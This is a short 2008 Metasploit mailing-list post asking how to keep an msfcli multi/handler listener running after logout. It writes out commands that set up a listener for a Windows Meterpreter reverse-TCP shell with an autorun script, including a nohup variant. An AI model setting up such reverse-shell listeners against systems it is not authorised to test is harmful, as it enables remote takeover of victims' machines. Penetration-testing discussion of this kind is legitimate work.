Metasploit mailing list archives

run after logout


From: jeffs at speakeasy.net (jeffs)
Date: Mon, 15 Dec 2008 11:48:08 -0500

I'd like to get a command like:

./msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp 
lhost=192.168.1.101 lport=4444 autorunscript=mynewscript E

to continue running after I logout so subsequent request work.

I have tried:

nohup ./msfcli exploit/multi/handler 
payload=windows/meterpreter/reverse_tcp lhost=192.168.1.101 lport=4444 
autorunscript=mynewscript E &

but this only works for one request after logging out of the terminal.

Is there something I'm missing here?

Thanks



Current thread: